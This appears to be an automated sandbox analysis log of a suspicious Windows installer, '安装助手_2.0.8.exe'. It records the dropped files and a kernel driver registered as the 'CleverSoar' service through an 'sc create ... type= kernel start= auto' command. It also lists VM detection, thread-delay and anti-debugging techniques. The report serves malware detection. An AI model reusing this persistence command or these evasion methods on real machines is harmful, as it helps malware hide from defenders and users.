Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Section loaded: apphelp.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Window found: window name: TMainForm
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.exe | Static file information: File size 5707365 > 1048576
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000C.00000003.2115894094.0000000003480000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.2115992185.0000000000AC0000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_009157D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount, 10_2_009157D0
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp.5.dr | Static PE information: real checksum: 0x0 should be: 0x343a15
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp.0.dr | Static PE information: real checksum: 0x0 should be: 0x343a15
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.exe | Static PE information: real checksum: 0x0 should be: 0x57356c
Source: update.vac.6.dr | Static PE information: real checksum: 0x0 should be: 0x379bd6
Source: update.vac.2.dr | Static PE information: real checksum: 0x0 should be: 0x379bd6
Source: hrsw.vbc.6.dr | Static PE information: real checksum: 0x0 should be: 0x379bd6
Source: tProtect.dll.12.dr | Static PE information: real checksum: 0x1eb0f should be: 0xfc66
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.exe | Static PE information: section name: .didata
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp.0.dr | Static PE information: section name: .didata
Source: update.vac.2.dr | Static PE information: section name: .00cfg
Source: update.vac.2.dr | Static PE information: section name: .voltbl
Source: update.vac.2.dr | Static PE information: section name: .=~
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp.5.dr | Static PE information: section name: .didata
Source: 7zr.exe.6.dr | Static PE information: section name: .sxdata
Source: is-596QU.tmp.6.dr | Static PE information: section name: .xdata
Source: hrsw.vbc.6.dr | Static PE information: section name: .00cfg
Source: hrsw.vbc.6.dr | Static PE information: section name: .voltbl
Source: hrsw.vbc.6.dr | Static PE information: section name: .=~
Source: update.vac.6.dr | Static PE information: section name: .00cfg
Source: update.vac.6.dr | Static PE information: section name: .voltbl
Source: update.vac.6.dr | Static PE information: section name: .=~
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Code function: 6_2_6C7886EB push ecx; ret 6_2_6C7886FE
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Code function: 6_2_6C630F00 push ss; retn 0001h 6_2_6C630F0A
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Code function: 6_2_6C856F10 push eax; ret 6_2_6C856F2E
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Code function: 6_2_6C7BB9F4 push 004AC35Ch; ret 6_2_6C7BBA0E
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Code function: 6_2_6C857290 push eax; ret 6_2_6C8572BE
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_008945F4 push 0093C35Ch; ret 10_2_0089460E
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_0092FB10 push eax; ret 10_2_0092FB2E
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_0092FE90 push eax; ret 10_2_0092FEBE
Source: update.vac.2.dr | Static PE information: section name: .=~ entropy: 7.19316283520878
Source: hrsw.vbc.6.dr | Static PE information: section name: .=~ entropy: 7.19316283520878
Source: update.vac.6.drStatic PE information: section name: .=~ entropy: 7.19316283520878
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpFile created: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpFile created: C:\Program Files (x86)\Windows NT\trash (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpFile created: C:\Users\user\AppData\Local\Temp\is-0UBJM.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exeFile created: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpFile created: C:\Users\user\AppData\Local\Temp\is-NMMH5.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpFile created: C:\Users\user\AppData\Local\Temp\is-NMMH5.tmp\update.vacJump to dropped file
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exeFile created: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeFile created: C:\Program Files (x86)\Windows NT\tProtect.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpFile created: C:\Program Files (x86)\Windows NT\7zr.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpFile created: C:\Program Files (x86)\Windows NT\is-596QU.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpFile created: C:\Users\user\AppData\Local\Temp\is-0UBJM.tmp\update.vacJump to dropped file
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp System information queried: FirmwareTableInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5888
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3866
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp Window / User API: threadDelayed 613
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp Window / User API: threadDelayed 596
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp Window / User API: threadDelayed 562
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\hrsw.vbc
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\trash (copy)
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-0UBJM.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-NMMH5.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-NMMH5.tmp\update.vac
Source: C:\Program Files (x86)\Windows NT\7zr.exe Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\tProtect.dll
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\is-596QU.tmp
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-0UBJM.tmp\update.vac
Source: C:\Program Files (x86)\Windows NT\7zr.exe API coverage: 7.4 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6532 Thread sleep time: -11068046444225724s >= -30000s
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp Code function: 6_2_6C77AEC0 FindFirstFileA,FindClose,FindClose,6_2_6C77AEC0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00896868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,10_2_00896868
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00897496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,10_2_00897496
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00899C60 GetSystemInfo,10_2_00899C60
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000002.00000002.2085306299.00000000011DD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000002.00000002.2085306299.00000000011DD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\.
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp Code function: 6_2_6C603886 NtSetInformationThread 00000000,00000011,00000000,00000000 6_2_6C603886
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp Code function: 6_2_6C790181 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_6C790181
